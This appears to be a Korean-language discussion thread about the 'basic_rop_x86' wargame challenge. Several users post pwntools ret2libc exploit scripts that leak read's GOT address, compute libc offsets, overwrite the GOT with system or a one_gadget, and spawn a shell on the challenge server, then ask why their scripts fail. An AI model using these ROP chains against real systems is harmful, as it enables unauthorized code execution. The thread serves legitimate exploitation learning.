basic_rop_x86

payload = "a"*0x40 # dummy payload += "a" * 4 # sfp payload += p32(read_plt) payload += p32(pppr) # pop pop pop ret payload += p32(0) payload += p32(bss) payload += p32(8) payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += "aaaa" payload += p32(bss) p.sendline(payload) p.send(binsh) p.recv(0x40) read_address = int(p.recv(4)[::-1].encode("hex"),16) libc_base = read_address - read_offset system_address = libc_base + system_offset p.send(p32(system_address)) p.interactive() 파이썬으로 exploit코드를 다음과 같이 짰습니다. read를 통해 bss영역에 /bin/sh를 저장시키고 write를 통해 read address를 leak했습니다. 제공된 libc.so.6을 통해 system함수와 read함수의 offset을 찾았습니다. 이를 통해 libc base를 얻을 수 있고 system함수의 offset을 더해서 address를 구해 read함수로 read_got에 system address를 overwrite했습니다 그 다음 read함수(system)을 호출해 exploit하는 건데 어느 코드부분이 잘 못 되었는데 쉘이 안따집니다ㅠㅠ

바이너리 실행 시 주어진 libc.so.6을 연결하려면 무얼 해줘야 하는지 궁금합니다. 검색하다 LD_LIBRARY_PATH를 추가하래서 현재 PATH(.)를 추가했는데 바이너리를 실행하면 코어 떨어지고 gdb로 열어도 실행조차 못시키고 무조건 0x00000073으로 가버리고 죽네요. 해결방법 혹은 어떻게 검색하면 좋을지 알려주세요. 감사합니다.

구글에서 이것저것 검색해서 glibc-2.XX.tar.gz 받아서 빌드하려니 안되네요. 환경 구축부터 버벅대고 있습니다...

로컬에 ASLR 적용했고 정상적으로 쉘 뜨는것도 확인했는데 같은 코드로 서버에 접속해서 실행하면 오류가 납니다 맨처음 read_got를 write 하는 payload 보내고 recv 받는값 찍어보니까 로컬에서는 잘 읽어오는데, 서버에서는 맨 처음 buf에 저장하는 aaaa를 읽어오네요 aaaa를 읽어왔다는건 read_got에 buf 에 입력했던 a*72가 저장되어있다는건데, write가 호출됬다는건 write_plt가 스택에 잘 들어간거고 a는 딱 buf와 SFP 까지만 채워졌다는건데 원인을 모르겠네요.. 혹시 짐작되시는 원인이 있다면 알려주시면 감사하겠습니다

전 basic_rop_x64를 먼저 풀어보고 이 문제를 풀었는데 x64를 풀 때에는 return address를 got주소로 덮어씌워서 rop chain을 구성했는데 이번 x86문제 풀이 할 때에는 got로 하면 엉뚱한 곳으로 가서 plt로 보니까 작동을 잘 하더라구요 이유가 궁금합니다!

페이로드 작성할때 자꾸 이 에러가 뜨는데 다른 사람 페이로드와 같은데 왜 자꾸 이게 뜨는거죠?..

from pwn import * context.log_level = 'debug' context.arch = 'i386' shell = remote('host3.dreamhack.games',22260) elf = ELF('./basic_rop_x86') libc = ELF('./libc.so.6') pppr = 0x08048689 read_plt = elf.plt['read'] read_got = elf.got['read'] write_plt = elf.plt['write'] payload = b'A'0x44 + b'B'0x4 #read_got 주소 릭 payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) read_got 에 system함수 입력 payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) system(/bin/sh\x00) payload += p32(read_plt) payload += p32(pr) payload += p32(read_got+0x8) shell.send(payload) shell.recvuntil(b'A'*0x40) read = u32(shell.recvn(4)) lb = read - libc.sym['read'] system = lb + libc.sym['system'] shell.send(p32(system)+b'/bin/sh\x00') shell.interactive() 잘못된 부분이 있을까요!

from pwn import * context.log_level = 'debug' p = remote('host1.dreamhack.games', 21445) libc = ELF("./libc.so.6") e = ELF("./basic_rop_x86") read_got = e.got['read'] write_plt = e.plt['write'] read_plt = e.plt['read'] read_offset = libc.symbols['read'] pppr = 0x8048689 one_gadget_offset = 0x5f066 payload = '' payload += 'a'* 0x48 payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) payload += p32(read_plt) p.sendline(payload) dummy = p.recv(0x40) read_addr = u32(p.recv(4)) #print hex(read_addr) libc_base = read_addr - read_offset one_gadget = libc_base + one_gadget_offset #print hex(one_gadget) p.sendline(p32(one_gadget)) p.interactive() $ one_gadget ./libc.so.6 0x3a80c execve("/bin/sh", esp+0x28, environ) constraints: esi is the GOT address of libc [esp+0x28] == NULL 0x3a80e execve("/bin/sh", esp+0x2c, environ) constraints: esi is the GOT address of libc [esp+0x2c] == NULL 0x3a812 execve("/bin/sh", esp+0x30, environ) constraints: esi is the GOT address of libc [esp+0x30] == NULL 0x3a819 execve("/bin/sh", esp+0x34, environ) constraints: esi is the GOT address of libc [esp+0x34] == NULL 0x5f065 execl("/bin/sh", eax) constraints: esi is the GOT address of libc eax == NULL 0x5f066 execl("/bin/sh", [esp]) constraints: esi is the GOT address of libc [esp] == NULL one_gadget을 이용해셔 풀려고 했는데 문제에서 준 libc파일에서 나오는 one_gadget모두를 써보았으나 eof에러가 납니다. 혹시 exploit 중에 문제가 있는지 봐 주실 수 있나요?

ROP를 이해하는데 생각보다 시간이 많이 걸렸네요.. 1) Buffer 의 크기가 0x40으로 설정을 했는데, compiler에 의해서 0x44 사이즈로 변경이 되는지요? esp 를 bsp에서 0x40만큼 sub 하고 나서, lea에서 ebp - 0x44 만큼 내려가는 이유가 있을까요? 0x080485dd <+4>: sub esp,0x40 0x080485e0 <+7>: lea edx,[ebp-0x44] 2) shell코드("/bin/sh")를 bss 영역에 먼저 쓰고, write 함수를 사용하여 read_got를 읽도록 payload를 짰는데, 이 경우에는 recv 함수에서 timeout이 발생됩니다. 그런데, read_got 주소를 먼저 읽고 나서, 쉘코드를 쓰면 recv 에서 받아지는데 차이가 있을까요? 아무래도 쉘코드의 정보때문에 그런것 같은데.. 어렵네요. read_got 주소를 읽는다. payload += p32(write_plt) payload += p32(pop3ret) payload += p32(1) payload += p32(read_got) payload += p32(4) ... /bin/sh 을 bss 영역에 쓴다 payload += p32(read_plt) payload += p32(pop3ret) payload += p32(0) payload += p32(bss) payload += p32(8)

basic rop x64도 그렇고 x86도 그렇고 둘다 왜 서버에서만 되고 로컬에서는 쉘을 못 따는 건가요?? 이유 아시는 분 계신가요 ㅠㅠ